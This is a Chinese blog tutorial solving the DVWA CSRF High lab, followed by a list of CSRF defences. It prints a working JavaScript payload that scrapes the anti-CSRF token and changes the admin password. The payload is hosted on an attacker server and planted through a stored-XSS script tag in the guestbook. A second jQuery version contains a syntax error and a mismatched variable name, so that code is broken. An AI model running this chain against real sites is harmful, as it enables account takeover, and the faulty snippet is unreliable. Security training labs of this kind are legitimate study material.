DVWA中CSRF高级

一、High级过关

1、访问CSRF页面,在页面的源代码中可以看到生成的Token

2、过关的核心

过关方案的核心在于要发送请求给http://10.37.129.2/DVWA/vulnerabilities/csrf/页面,然后从响应中取得Token(通过正则表达式可以提取出来的),取得后再将Token和新密码一起发送给http://10.37.129.2/DVWA/vulnerabilities/?user_token=TOKEN&password_new=123456&password_conf=123456&Change=Change页面完成密码修改

3、构造JS代码

先构造一个javascript原生代码发送AJAX请求的代码:

var tokenUrl = 'http://10.37.129.2/DVWA/vulnerabilities/csrf/';
var count = 0;
//示例化XMLHttpRequest,用于发送AJAX请求
xmlhttp = new XMLHttpRequest();
    //当请求的状态发生变化时,触发执行代码
    xmlhttp.onreadystatechange = function(){
        //状态码:0:请求未初始化,1:服务器连接已成立,2:请求已接收,3:请求处理中,4:请求已完成,且响应已就绪
        if(xmlhttp.readyState == 4 && xmlhttp.status == 200)
        {
            //取得请求的响应,并从响应中通过正则提取Token
            var text = xmlhttp.responseText;
            var regex = /user_token\' value\=\'(.*?)\' \/\>/;
            var match = text.match(regex);
            //alert(match[1]);
            var token = match[1];
            //发送修改密码的语法
            var changeUrl = 'http://10.37.129.2/DVWA/vulnerabilities/csrf/?user_token='+token+'&password_new=123456&password_conf=123456&Change=Change';
            if (count == 0){
                count =1; //只发送一次,否则会多次发送
                xmlhttp.open("GET",changeUrl,false);  //false代表同步方式发送
                xmlhttp.send();
            }
        }
    };
xmlhttp.open("GET",tokenUrl,false);
xmlhttp.send();

将上述javascript代码放置于攻击服务器上,如:http://10.211.55.16/csrf.js

想办法将上述JS代码嵌入到被攻击服务者服务器上即可完成。(而这一步,在High级无法实现)

因为在High级,时屏蔽了<script>标签的,所以无法直接使用

所以我们的解决方法是:先切换到low级,在留言本里面注入以下脚本,然后再切换到High级,直接触发改密。

<script src="http://10.211.55.16/csrf.js?"+Math.random()></script>

 

 我们发现Message那个地方,我们输入的东西的长度大于那个框所允许输入的长度

所以接下来我们先打开F12,将这个框的maxlength改为500

然后重新将我们的<script>代码输入进去,点击Sign Guestbook,发现保存成功

 看一下数据库里进去没有,发现已经输入进去啦

然后我们点击切换到高级,就能完成改密啦

 我们之前的密码是password,新密码是123456,让我们验证一下密码是否被修改

当我们输入admin,password的时候告诉我们密码不正确

 当我们输入admin,123456的时候,告诉我们密码正确

可以使用Fidder完整监听整个过程,也可以使用浏览器F12调试模式进行处理。 

思考:为什么此处要使用javascript原生代码来发送请求,使用JQuery不是更简单吗?

var script = document.createElement("script");
script.type="text/javascript";
script.src="http://10.211.55.16/jquery-3.4.1.min.js";
document.getElementsByTagName('head')[0].appendChild(script);

setTimeout(function)() {
    $(document).ready(function(){
        var tokenUrl = 'http://10.37.129.2/DVWA/vulnerabilities/csrf/';
        $.get(tokenUrl,function(data){
            var regex = /user_token\' value\=\'(.*?)\' \/\>/;
            var match = data.match(regex);
            var token = match[1];
            var changeUrl = 'http://10.37.129.2/DVWA/vulnerabilities/csrf/?user_token='+token+'&password_new=123456&password_conf=123456&Change=Change';
            $.get(changeurl,function(data){
                alert('done');
            });
        });
     });
},500);

 二、CSRF防御

(1)避免在URL中明文显示特定操作的参数内容;

(2)使用同步令牌(Synchronizer Token),检查客户端请求是否包含令牌及其有效性;(常用的做法,并且保证每次Token的值完全随机且每次不同)

(3)检查Referer Header,拒绝来自非本网站的直接URL请求。

(4)不要在客户端保存敏感信息(比如身份认证信息);

(5)设置会话过期机制,比如20分钟无操作,直接登录超时退出;

(6)敏感信息的修改时需要对身份进行二次确认,比如修改账号时,需要判断旧密码;

(7)敏感信息的修改使用post而不是get

(8)避免交叉漏洞,如XSS等

(9)禁止跨域访问

(10)在响应中设置CSP (Content-Security-Police)内容安全策略

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值